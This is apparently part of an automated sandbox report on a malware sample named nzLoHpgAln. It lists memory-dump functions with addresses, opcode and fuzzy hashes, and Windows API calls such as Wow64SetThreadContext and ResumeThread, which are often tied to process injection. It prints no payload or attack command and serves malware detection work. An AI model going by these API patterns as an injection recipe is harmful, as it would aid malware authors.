API String ID: 544645111-0
Opcode ID: 55773fc8003b6ddbef8fd50fd691ffbfbbd48b2fbd3470df6fb4d6643d0310aa
Instruction ID: 65f48e8708f208c9c0818f09af9ec978798c23331cc6585193d9858106f4af96
Opcode Fuzzy Hash: 55773fc8003b6ddbef8fd50fd691ffbfbbd48b2fbd3470df6fb4d6643d0310aa
Instruction Fuzzy Hash: D93197B9D00258DFCB10CFA9D884ADEFBF5BB19310F24902AE819B7250D775A985CF64

Function 09F470B8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 09F47167

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 49c5b0d2fb2bb523638be57ef6e893b9760c35341f163311a3c2ec629b6a01a3
Instruction ID: d168f4706972565a7ce9018b86749f50c1128a05d57a6801aa41437ce0aac56f
Opcode Fuzzy Hash: 49c5b0d2fb2bb523638be57ef6e893b9760c35341f163311a3c2ec629b6a01a3
Instruction Fuzzy Hash: 0431ACB5D012589FCB14DFAAD885AEEFFF1BB49310F14902AE419B7240D738A945CF54

Function 09F4BCC0 Relevance: 1.6, APIs: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,00000000), ref: 09F4BD63

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0708b04b31fce06b7d446e5375ac7ba6d847ba69d1eebd2250a06d9d30107e5f
Instruction ID: c50b36dd6b3264af2bbe4fbdd63251ff0c29ff1e7f0e148f0ad4702b7940521c
Opcode Fuzzy Hash: 0708b04b31fce06b7d446e5375ac7ba6d847ba69d1eebd2250a06d9d30107e5f
Instruction Fuzzy Hash: AD3187B9D00258AFCB10CFA9D984ADEFBF5EB59310F14905AE818B7310D335A945CF64

Function 09F46900 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,00000000), ref: 09F4BD63

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 57393271783ec49d87570fdc3e8a64298a19d579804f0a4a377f65f5c60b5e6e
Instruction ID: 1866a4c23877136acb3a48578ca376c8ce559d4b7c7d50ee1d9bc10fe0ff3a7d
Opcode Fuzzy Hash: 57393271783ec49d87570fdc3e8a64298a19d579804f0a4a377f65f5c60b5e6e
Instruction Fuzzy Hash: EF31A8B9D00248AFCB10CFA9D984ADEFBF0EB19310F14906AE818BB310D375A945CF54

Function 0081A261 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 0081A302

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 6579ba77759240d04e8c7b6f434b23c6007dcbb374e8c8f12196212f1c6cc300
Instruction ID: 95f1691dfbb05fe737d4dde5f1cfb0857d8c12623c8d2e88f62c1a5d5eda749e
Opcode Fuzzy Hash: 6579ba77759240d04e8c7b6f434b23c6007dcbb374e8c8f12196212f1c6cc300
Instruction Fuzzy Hash: 6E31B8B4D012589FCB14CFA9D984ADEFBF5AF49310F14802AE818B7360D374A945CF64

Function 048F5660 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 048F56F2

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b7a9a988eedad10418a1950eb17a30b57d6c2a1674264b6f7a6f7e1397fc4b32
Instruction ID: 48e31b8d42731c9eb8ada03755148b59bd6bcccb59b4a601ed04d98dca4258f8
Opcode Fuzzy Hash: b7a9a988eedad10418a1950eb17a30b57d6c2a1674264b6f7a6f7e1397fc4b32
Instruction Fuzzy Hash: C231CAB4D00248DFCB14CFAAD884ADEFBF1AB48310F14902AE918B7321D334A945CF64

Function 09F46FC3 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 09F47046

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: bad61bdb8e59777d319538e229e46dd7a58926493dfe0be4a24853dbb6a3f471
Instruction ID: 5de00311cd8b9aca1527731dbb095b8ded5e95320fa577cd57097eff228f3989
Opcode Fuzzy Hash: bad61bdb8e59777d319538e229e46dd7a58926493dfe0be4a24853dbb6a3f471
Instruction Fuzzy Hash: 8531CBB4D012189FCF14DFAAD885A9EFBB1AB49320F10952AE419B7340C739A945CF54

Function 09F46FC8 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 09F47046

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 84e88613db51edde60c80e2da488dc384dbd7bb4385038091d7b04b679dbbb96
Instruction ID: ba7fcc908e42c249990c7a45bed1655c193932bf0aa68f97c0504a14b6a07a59
Opcode Fuzzy Hash: 84e88613db51edde60c80e2da488dc384dbd7bb4385038091d7b04b679dbbb96
Instruction Fuzzy Hash: 7D31AAB4D012189FCF14DFAAD885A9EFBF5EB49310F10942AE819B7340D739A945CF94

Function 0081A359 Relevance: 1.3, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0081A3DE

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 43df1a731e25da6c5924c962680d2159ac33f65d590076529f37900f871560dd
Instruction ID: 614056ae1882a6adc540ddecc1b7015f0995013ef5b61843a79722ad98a0ce3f
Opcode Fuzzy Hash: 43df1a731e25da6c5924c962680d2159ac33f65d590076529f37900f871560dd
Instruction Fuzzy Hash: E131CBB8C052189FCB10CFA9D889AEEFBF4EB49310F14905AE815B3350C374A985CFA5

Function 00819920 Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0081A3DE

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c7f87665bf89fef435e8e6826be597cd9d5a65c8b7e918d8da9ecc9d9d90d990
Instruction ID: b67378480377ca97abf051d2f11201c798d66233367bd4e3a3b44817060c83d2
Opcode Fuzzy Hash: c7f87665bf89fef435e8e6826be597cd9d5a65c8b7e918d8da9ecc9d9d90d990
Instruction Fuzzy Hash: 0B319CB4D042189FCB14CFA9D484AEEFBF4EB49314F14906AE815B3350D375A944CFA5

Function 007AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750411798.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ad000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3728b08ed9ec0afa177a292e825521c7b6268bf3ada99c60b082154e5e9c273a
Instruction ID: 7c1fc1f12eea9317919b4b730fd5157b934aa9e65cc558b1545c9b730894f026
Opcode Fuzzy Hash: 3728b08ed9ec0afa177a292e825521c7b6268bf3ada99c60b082154e5e9c273a
Instruction Fuzzy Hash: 1F21D3B5604204DFCB24DF14D9C4B17BBA5EB99314F24C669D80B4B696C33ADC07CA61

Function 007AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750411798.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ad000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 050925c706f9b7fc950e5fa9e1962e5f3aa69f62d073f07795098c35d12f4844
Instruction ID: d4352d60b3380a6bf637767351e2c7f8e40df125846e54a4f88bbebcaa33ac48
Opcode Fuzzy Hash: 050925c706f9b7fc950e5fa9e1962e5f3aa69f62d073f07795098c35d12f4844
Instruction Fuzzy Hash: D921F5B5604204EFDB15DF14D9C4B25BBA5FBD5314F24C66DD80B4B691C33ADC06CA61

Function 007AD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750411798.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ad000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 235bd63edf850e0a980a5c27efbbb9c5b592cd8fb7646379678b07b1dae48601
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 9111DD75904280DFCB12CF10C5C4B15FBB2FB85324F24C6ADD84A4B6A6C33AD80ACB61

Function 007AD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750411798.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ad000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 0cc0a91d2039e4e1be1028c661a27640184c1a874aa4bce45543db494d798980
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: AC11D075504280CFCB11CF14D5C4B16FB72FB89314F24C6ADD84A4B656C33AD80ACB61

Function 0079D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750377010.000000000079D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0079D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79d000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b2c25aa4c5bd2707352317e8ca16d6c957add5614e6c2aa96dbca9ff7a4c00
Instruction ID: 34c27f70e875ba73b5d07d3d9a2bc95862562af14eb0d5303a15f2cf0bb8b784
Opcode Fuzzy Hash: a4b2c25aa4c5bd2707352317e8ca16d6c957add5614e6c2aa96dbca9ff7a4c00
Instruction Fuzzy Hash: 6C01DB710043449AEB309EA5EDC8B66BFD8DF61325F18C51AED190B286D77D9C40C771

Function 0079D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750377010.000000000079D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0079D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79d000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5bed4a6f9bca9d6615d251b30b4aa416f46a26a7c1a6007af704cdc2a844935
Instruction ID: a4605679d69cc90952ff546a65375d1762c202750912dd198791fc5121c49d9d
Opcode Fuzzy Hash: c5bed4a6f9bca9d6615d251b30b4aa416f46a26a7c1a6007af704cdc2a844935
Instruction Fuzzy Hash: B7F062714043449AEB209E55DC88B62FFD8EB51734F18C45AED095A286D7799C44CBB1

Non-executed Functions

Function 008117D0 Relevance: 4.0, Strings: 3, Instructions: 254COMMON

Download Yara Rule

Strings

DNz, xrefs: 008119D9
pRz, xrefs: 008119B5
DNz, xrefs: 008118FD

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: DNz$DNz$pRz
API String ID: 0-3764190368
Opcode ID: a81a6478f9e36102a874336363748ac03b48712ca17070ff441250a5f714d6ea
Instruction ID: 83ce131a66ba61d0ac933f3242dec27d5dbeabdae7094ec2066f102754c0d1e8
Opcode Fuzzy Hash: a81a6478f9e36102a874336363748ac03b48712ca17070ff441250a5f714d6ea
Instruction Fuzzy Hash: EFB10A74E1121A9FCF44DFA8D844ADDBBB2FF89300F108625E519AB355DB34A986CF80

Function 008146B8 Relevance: 3.9, Strings: 3, Instructions: 178COMMON

Download Yara Rule

Strings

69, xrefs: 00814792
69, xrefs: 00814774
69, xrefs: 0081476D

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: 69$69$69
API String ID: 0-1980717299
Opcode ID: 38462dfb11d21ecae0808e91116624b301c3983d8b3c753edcfad81b0210964e
Instruction ID: c01dcd582d78f59127e70afb7df5896f8339df1f85dc52d7471a7243e0e22fb9
Opcode Fuzzy Hash: 38462dfb11d21ecae0808e91116624b301c3983d8b3c753edcfad81b0210964e
Instruction Fuzzy Hash: 0281D074E11219CFCB04CFA9C98499EFBF5FF89314B24956AE419EB260D334AA42CF51

Function 008146A9 Relevance: 3.9, Strings: 3, Instructions: 176COMMON

Download Yara Rule

Strings

69, xrefs: 00814792
69, xrefs: 00814774
69, xrefs: 0081476D

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: 69$69$69
API String ID: 0-1980717299
Opcode ID: 98c64645e65b4c24aa1acb73b833500a4091d961d6da563a649f05afa58d9ae2
Instruction ID: f83626f718b0689edfb3e685f838874e1e8cde77b5713670e25e7122e79551c5
Opcode Fuzzy Hash: 98c64645e65b4c24aa1acb73b833500a4091d961d6da563a649f05afa58d9ae2
Instruction Fuzzy Hash: 2D71E074A15209CFCB04CFA9C9849AEFBF5FF89314B24956AD419EB261D330AA42CF51

Function 00815D80 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

>lR}, xrefs: 00815ED2

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: >lR}
API String ID: 0-3594801309
Opcode ID: 0c57d1b387a19d70bf0e3d9918c7aa1a3fe692d57e1a8ced5e573e8ec3f7c3b7
Instruction ID: 5c4a75a67979987ebcadfeca9d563c1d65d317bd78dddc4173756ad585845853
Opcode Fuzzy Hash: 0c57d1b387a19d70bf0e3d9918c7aa1a3fe692d57e1a8ced5e573e8ec3f7c3b7
Instruction Fuzzy Hash: EA41D0B4E0560ADFCB08DFAAC5815EEFBB6FF88300F20C56AC415E7214D7349A819B94

Function 048FA428 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa843ebc9b4d80a83643a9b8cbe8ada264e7d0eb5ae4d14bae8024d1e1807389
Instruction ID: 844cab2578cfed424d3c7055821ff161c5d8191132383c66420f7eda49caa496
Opcode Fuzzy Hash: fa843ebc9b4d80a83643a9b8cbe8ada264e7d0eb5ae4d14bae8024d1e1807389
Instruction Fuzzy Hash: 1512D4F1C11F468BE310CFB5EC692893BA1BB4532AB944208DA652B2F1D7F9164BCF44

Function 09F44374 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c00af7cf8bcc484c1d9e34a24a59bbc11ca5defca6a0f35685eccba2989f7b70
Instruction ID: 9a35cd3020b0249863da4ee9937614e16824e2cea01dea2500d16798c038268c
Opcode Fuzzy Hash: c00af7cf8bcc484c1d9e34a24a59bbc11ca5defca6a0f35685eccba2989f7b70
Instruction Fuzzy Hash: 8CE1C674E002198FDB14DFA9C580AAEFBF2FF89304F248269D419AB355D730A941CFA1

Function 09F44BE8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27bb8cac4785201e1d2888d7618f5a0db24ec330cf27c0b6ddc551e116546e78
Instruction ID: 23809d9b941b178337567e6279a30b60e4e5a1e284a17f141af12d3764830fee
Opcode Fuzzy Hash: 27bb8cac4785201e1d2888d7618f5a0db24ec330cf27c0b6ddc551e116546e78
Instruction Fuzzy Hash: F3E1D874E002198FDB14DFA9C590AAEBBF2FF89304F248269E415AB355D731AD41CFA1

Function 09F462C0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a581ff5d50629d8480fa003d07bd9acb08f835458329f3ec252f246fe3f306
Instruction ID: ed24ea53bb36bdd27ef29bdf0e7533681e189eb35e83affa91f6a43928594726
Opcode Fuzzy Hash: d2a581ff5d50629d8480fa003d07bd9acb08f835458329f3ec252f246fe3f306
Instruction Fuzzy Hash: 30E1E774E002198FDB14DFA9C5809AEBBB2FF89304F249269E419EB355D731AD81CF61

Function 09F447B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ded5a54fb1a549af8d7a2a3aeec4444e3b8e607b7dc176adb3a1c47b84980bd
Instruction ID: 8c3f7efec52ca456e0552592b1575385e2c92ab783fb8fa147809846b87a6333
Opcode Fuzzy Hash: 1ded5a54fb1a549af8d7a2a3aeec4444e3b8e607b7dc176adb3a1c47b84980bd
Instruction Fuzzy Hash: 50E1E674E002198FDB14DFA9C580AAEFBF2FF89304F249269E419AB355D731A941CF61

Function 09F45E88 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6ff8e57c0c15ad759dc63df7bb80da0ee0cc542274b9ba8b284550b21215046
Instruction ID: b676d14f1076333780d6dabacd7cd9604f19333abf2830aee08e6fadb0634c16
Opcode Fuzzy Hash: e6ff8e57c0c15ad759dc63df7bb80da0ee0cc542274b9ba8b284550b21215046
Instruction Fuzzy Hash: 86E1E874E002198FDB14DFA9C5809AEBBB2FF89304F24D269E419AB356D731AD41CF61

Function 048F847C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c05b403ef99f9793f5256090034c1b369a7806bfcb1e0ae12a3356613d8744b
Instruction ID: 40a86fbf51b0bab1a6ab4b0ddf546cc757b268e6d40fab33a3aba8a855679d3b
Opcode Fuzzy Hash: 9c05b403ef99f9793f5256090034c1b369a7806bfcb1e0ae12a3356613d8744b
Instruction Fuzzy Hash: 4FA18E72E00205CFCF05DFA9C84459EB7B2FF88305B154A6AEA05EB221EB71E955CB90

Function 048FA41A Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22a1114b7a45bed7ade18d366ac398fadca7860f3ee6e2affde7b52a732d599a
Instruction ID: 47154bab866f9e1ba2e84920003341ea4477340d4d0df6e23e8683cefb0fab29
Opcode Fuzzy Hash: 22a1114b7a45bed7ade18d366ac398fadca7860f3ee6e2affde7b52a732d599a
Instruction Fuzzy Hash: 5DC125B1C10B468BD710CFB5EC692897BB1BB8532AF554209D6652B2F0D7B8268BCF44

Function 00815AF0 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed72fb01f8ca9f31e04d9ee4a07669ee587aca477c602113827980e22aa2a0e
Instruction ID: b418b4ca35e9a8134fff1e50ea6d70363b7dcc7d271a04453d2909ed67e6262e
Opcode Fuzzy Hash: 1ed72fb01f8ca9f31e04d9ee4a07669ee587aca477c602113827980e22aa2a0e
Instruction Fuzzy Hash: 6271E475E19609DFCB04CFA9D5805DEFBF6FF88324F24942AD405BB224D3309A428B54

Function 008158A9 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dbe958af81efb8ebc40b5eb93bd8c5d11c3d5292f62e9257be6209c027add7b
Instruction ID: 23fa1ca8fa5c7b8bfe9285bf1b41b921402bcd9a12e89e5c559acc7340e22795
Opcode Fuzzy Hash: 3dbe958af81efb8ebc40b5eb93bd8c5d11c3d5292f62e9257be6209c027add7b
Instruction Fuzzy Hash: 8241E270D0460ACFCB04CFAAD9815EEBBB6FF89314F24D46AC415E7254E334A6858F95

Function 008158B8 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6002b5116a8daf68b32e73bdf2ddd54c39d6a2503fd52294861143457294afc
Instruction ID: c1000821bf43a23ba116ac178ab5c35817e43808defe2c2c0e7d021ef8b0d397
Opcode Fuzzy Hash: d6002b5116a8daf68b32e73bdf2ddd54c39d6a2503fd52294861143457294afc
Instruction Fuzzy Hash: 3A41C070E0460ACBCB04CFAAD5815EEFBBAFF88314F24D42AC415E6254E7349A858F95

Function 00815F50 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddb9d6f7d9f8246317ff7aabcdcc984802964e3b0f0cbcecefed4091bf61ca4c
Instruction ID: fff82cbdf52c7df991ff5ba6f893c0c98a398c37a23219193faec63468417146
Opcode Fuzzy Hash: ddb9d6f7d9f8246317ff7aabcdcc984802964e3b0f0cbcecefed4091bf61ca4c
Instruction Fuzzy Hash: 1C416975E05A588FDB18CF6B894469AFBF3BFC9300F14C1BAD50CAA265EB3419858F11

Function 048FAF2C Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7c47a2650efb545e4d8fc8406d8645842ff0c0ebe8d4cc2135706bd417a930
Instruction ID: f543c7b822bc1b7f1a396f2973dd669c73ce63ad572d8c9714f30c2d1dfbe9a5
Opcode Fuzzy Hash: 8c7c47a2650efb545e4d8fc8406d8645842ff0c0ebe8d4cc2135706bd417a930
Instruction Fuzzy Hash: B731A9B8D012089FCB14DFA9E984ADEFBF1EB49310F20942AE909B7310D335A945CF94

Function 048FD088 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d05e7de9f6639b227b0abf10524d6ffac84ff3786dd850842b5b5e70a50142
Instruction ID: 50695990b9a00aaad5975cda1b8b462f95881a2f102b15a8d57a04a1e523e483
Opcode Fuzzy Hash: 48d05e7de9f6639b227b0abf10524d6ffac84ff3786dd850842b5b5e70a50142
Instruction Fuzzy Hash: 2431A8B9D012089FCB14CFA9E984ADEFBF1BB49310F20942AE919B7310D334A945CF54

Function 00818970 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d11217c545a07c8d6c83798c7b9f643eb75e5253287da6274cccf64825114ed
Instruction ID: db184896fcd70d87e2934c9b8f03389f7e5fda69ada53759bcb98c4eb07017c3
Opcode Fuzzy Hash: 5d11217c545a07c8d6c83798c7b9f643eb75e5253287da6274cccf64825114ed
Instruction Fuzzy Hash: 9731D471E11619CBDB18CFAAD8416EEBBB7BFC8300F14C16AE509E7214DB305A458FA1

Function 00818960 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
